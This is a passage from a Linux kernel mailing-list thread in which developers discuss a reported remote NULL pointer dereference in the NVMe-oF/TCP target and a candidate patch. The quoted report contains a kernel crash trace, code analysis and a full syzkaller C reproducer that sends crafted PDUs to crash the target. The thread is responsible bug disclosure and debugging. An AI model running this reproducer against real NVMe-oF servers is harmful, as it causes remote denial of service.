@ 2023-11-20  6:03     ` Guoqing Jiang
  0 siblings, 0 replies; 6+ messages in thread
From: Guoqing Jiang @ 2023-11-20  6:03 UTC (permalink / raw)
  To: Alon Zahavi
  Cc: linux-nvme, Sagi Grimberg, Christoph Hellwig, Chaitanya Kulkarni



On 11/20/23 06:18, Alon Zahavi wrote:
> On Thu, 16 Nov 2023 at 05:28, Guoqing Jiang <guoqing.jiang@linux.dev> wrote:
>>
>> Could you try the change to see if it helps?
>>
>> --- a/drivers/nvme/target/tcp.c
>> +++ b/drivers/nvme/target/tcp.c
>> @@ -1062,7 +1062,7 @@ static int nvmet_tcp_done_recv_pdu(struct
>> nvmet_tcp_queue *queue)
>> le32_to_cpu(req->cmd->common.dptr.sgl.length));
>>
>>                   nvmet_tcp_handle_req_failure(queue, queue->cmd, req);
>> -               return 0;
>> +               return -EAGAIN;
>>           }
>>
>> Thanks,
>> Guoqing
> Checked it.
> Although it seems useful to return some error here anyways, it doesn't
> help with the bug.
> The flow leading to the NULL deref doesn't reach this code at all,
> which is probably
> part of why it happens.
> The call trace looks like this:
> ```
>   nvmet_tcp_execute_request drivers/nvme/target/tcp.c:578 [inline]
>   nvmet_tcp_try_recv_data drivers/nvme/target/tcp.c:1232 [inline]
>   nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1312 [inline]
>   nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338 [inline]
>   nvmet_tcp_io_work+0x202a/0x2990 drivers/nvme/target/tcp.c:1388
> ```
> so `nvmet_tcp_done_recv_pdu` is not called here.

My guess is if  rcv_state == NVMET_TCP_RECV_PDU, so

nvmet_tcp_try_recv_one -> nvmet_tcp_try_recv_pdu
                                                 -> return 
nvmet_tcp_done_recv_pdu
                                                     -> 
nvmet_tcp_handle_req_failure
                                                         -> *rcv_state = 
NVMET_TCP_RECV_DATA*
                                                     -> return 0

then back to nvmet_tcp_try_recv_one, it continues to call
nvmet_tcp_try_recv_data instead of goto done_recv.

Thanks,
Guoqing


^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request`
  2023-11-06 13:39 [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request` Alon Zahavi
  2023-11-15  9:40 ` Alon Zahavi
  2023-11-16  3:28 ` Guoqing Jiang
@ 2023-11-20 10:36 ` Sagi Grimberg
  2 siblings, 0 replies; 6+ messages in thread
From: Sagi Grimberg @ 2023-11-20 10:36 UTC (permalink / raw)
  To: Alon Zahavi, linux-nvme; +Cc: Christoph Hellwig, Chaitanya Kulkarni


> # Bug Overview
> 
> ## The Bug
> There is a null-ptr-deref in `nvmet_tcp_execute_request`.
> 
> ## Bug Location
> `drivers/nvme/target/tcp.c` in the function `nvmet_tcp_execute_request`.
> 
> ## Bug Class
> Remote Denial of Service
> 
> ## Disclaimer:
> This bug was found using Syzkaller with NVMe-oF/TCP added support.

Hey Alon, thanks for the report.

> 
> # Technical Details
> 
> ## Kernel Report - NULL Pointer Dereference
> ```
> BUG: kernel NULL pointer dereference, address: 0000000000000000
> #PF: supervisor instruction fetch in kernel mode
> #PF: error_code(0x0010) - not-present page
> PGD 800000003c2bc067 P4D 800000003c2bc067 PUD 3dfc5067 PMD 0
> Oops: 0010 [#1] PREEMPT SMP KASAN PTI
> CPU: 0 PID: 2363 Comm: kworker/0:1H Not tainted 6.5.0-rc1+ #4
> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
> Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
> RIP: 0010:0x0
> Code: Unable to access opcode bytes at 0xffffffffffffffd6.
> RSP: 0018:ffff888013b0fba8 EFLAGS: 00010246
> RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
> RDX: ffff888013d50000 RSI: ffffffff833ddfe5 RDI: ffff88800e5a33e8
> RBP: ffff888013b0fcf0 R08: 0000000000000001 R09: 0000000000000000
> R10: 0000000000000000 R11: 0000000000000001 R12: ffff88800e5a33e8
> R13: 0000000000000000 R14: ffff88800e5a33e0 R15: dffffc0000000000
> FS:  0000000000000000(0000) GS:ffff88806cc00000(0000) knlGS:0000000000000000
> CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> CR2: ffffffffffffffd6 CR3: 0000000016faa003 CR4: 0000000000370ef0
> Call Trace:
>   <TASK>
>   nvmet_tcp_execute_request drivers/nvme/target/tcp.c:578 [inline]
>   nvmet_tcp_try_recv_data drivers/nvme/target/tcp.c:1232 [inline]
>   nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1312 [inline]
>   nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338 [inline]
>   nvmet_tcp_io_work+0x202a/0x2990 drivers/nvme/target/tcp.c:1388
>   process_one_work+0xb54/0x18b0 kernel/workqueue.c:2597
>   worker_thread+0x663/0x1300 kernel/workqueue.c:2748
>   kthread+0x357/0x460 kernel/kthread.c:389
>   ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
>   </TASK>
> Modules linked in:
> CR2: 0000000000000000
> ---[ end trace 0000000000000000 ]---
> ```
> 
> ## Description
> 
> ### Tracing The Bug
> In the call for `nvmet_tcp_execute_request` (see code block 1), there
> is a call to `cmd->req.execute()`.
> When executing the reproducer, the function pointer is pointing to
> NULL, thus the BUG: Unable to handle NULL pointer dereference.
> 
> Code Block 1:
> ```
> static void nvmet_tcp_execute_request(struct nvmet_tcp_cmd *cmd)
> {
>      if (unlikely(cmd->flags & NVMET_TCP_F_INIT_FAILED))
>          nvmet_tcp_queue_response(&cmd->req);
>      else
>          cmd->req.execute(&cmd->req);
> }
> ```
> 
> The reason why `cmd->req.execute` is NULL when we get into the
> `nvmet_tcp_execute_request` function lies in the `nvmet_req_init`
> function (drivers/nvme/target/core.c).
> 
> Code Block 2:
> ```
> bool nvmet_req_init(struct nvmet_req *req, struct nvmet_cq *cq,
>                                   struct nvmet_sq *sq, const struct
> nvmet_fabrics_ops *ops)
> {
>      ...
> 
>      if (unlikely(!req->sq->ctrl))
>          /* will return an error for any non-connect command: */
>          status = nvmet_parse_connect_cmd(req);
>      else if (likely(req->sq->qid != 0))
>          status = nvmet_parse_io_cmd(req);
>      else
>          status = nvmet_parse_admin_cmd(req);
> 
>    ...
> }
> ```
> 
> In the `nvmet_parse_admin_cmd` and `nvmet_parse_connect_cmd`
> functions, there are some assignments for `req->execute`.
> For example, here is in code block 3, the assignment in
> `nvmet_parse_connect_command` (drivers/nvme/target/fabrics-cmd.c).
> 
> Code Block 3:
> ```
> u16 nvmet_parse_connect_cmd(struct nvmet_req *req)
> {
>      struct nvme_command *cmd = req->cmd;
> 
>      ...
> 
>      if (cmd->connect.qid == 0)
>          req->execute = nvmet_execute_admin_connect;
>      else
>          req->execute = nvmet_execute_io_connect;
>       return 0;
> }
> ```
> 
> ## Root Cause
> When executing the reproducer the `nvmet_parse_connect_cmd` is not
> being called, but execution is continuing to
> `nvmet_tcp_execute_request` .

Your analysis tells me that sq->ctrl was not properly set to NULL when
a connect command was sent? The place where sq->ctrl is set is when
executing a connect command.

Can you send a log trace from nvmet leading up to the stack trace?
Also, I'm trying to decipher what the reproducer does?
tcp connect + icreq + nvme connect pdus?

> 
> ## Reproducer
> I am adding a reproducer generated by Syzkaller with some
> optimizations and minor changes.
> 
> ```
> // autogenerated by syzkaller (https://github.com/google/syzkaller)
> 
> #define _GNU_SOURCE
> 
> #include <endian.h>
> #include <errno.h>
> #include <fcntl.h>
> #include <sched.h>
> #include <stdarg.h>
> #include <stdbool.h>
> #include <stdint.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/mount.h>
> #include <sys/prctl.h>
> #include <sys/resource.h>
> #include <sys/stat.h>
> #include <sys/syscall.h>
> #include <sys/time.h>
> #include <sys/types.h>
> #include <sys/wait.h>
> #include <unistd.h>
> 
> #include <linux/capability.h>
> 
> uint64_t r[1] = {0xffffffffffffffff};
> 
> void loop(void)
> {
>    intptr_t res = 0;
>    res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
>    if (res != -1)
>      r[0] = res;
>    *(uint16_t*)0x20000100 = 2;
>    *(uint16_t*)0x20000102 = htobe16(0x1144);
>    *(uint32_t*)0x20000104 = htobe32(0x7f000001);
>    syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
>    *(uint8_t*)0x200001c0 = 0;
>    *(uint8_t*)0x200001c1 = 0;
>    *(uint8_t*)0x200001c2 = 0x80;
>    *(uint8_t*)0x200001c3 = 0;
>    *(uint32_t*)0x200001c4 = 0x80;
>    *(uint16_t*)0x200001c8 = 0;
>    *(uint8_t*)0x200001ca = 0;
>    *(uint8_t*)0x200001cb = 0;
>    *(uint32_t*)0x200001cc = 0;
>    memcpy((void*)0x200001d0,
>           "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
>           "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
>           "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35"
>           "\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
>           "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
>           "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
>           "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86",
>           112);
>    syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
>            /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
>    *(uint8_t*)0x200001c0 = 6;
>    *(uint8_t*)0x200001c1 = 3;
>    *(uint8_t*)0x200001c2 = 0x18;
>    *(uint8_t*)0x200001c3 = 0x18;
>    *(uint32_t*)0x200001c4 = 9;
>    *(uint16_t*)0x200001c8 = 0;
>    *(uint16_t*)0x200001ca = 0;
>    *(uint32_t*)0x200001cc = 0;
>    *(uint32_t*)0x200001d0 = 0;
>    memset((void*)0x200001d4, 0, 4);
>    *(uint64_t*)0x20000240 = 0;
>    syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x88ul,
>            /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
> }
> int main(void)
> {
>    syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
>            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>    syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
>            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>    syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
>            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>    loop();
>    return 0;
> }
> ```


^ permalink raw reply	[flat|nested] 6+ messages in thread

end of thread, other threads:[~2023-11-20 10:37 UTC | newest]

Thread overview: 6+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2023-11-06 13:39 [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request` Alon Zahavi
2023-11-15  9:40 ` Alon Zahavi
2023-11-16  3:28 ` Guoqing Jiang
2023-11-19 22:18   ` Alon Zahavi
2023-11-20  6:03     ` Guoqing Jiang
2023-11-20 10:36 ` Sagi Grimberg

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).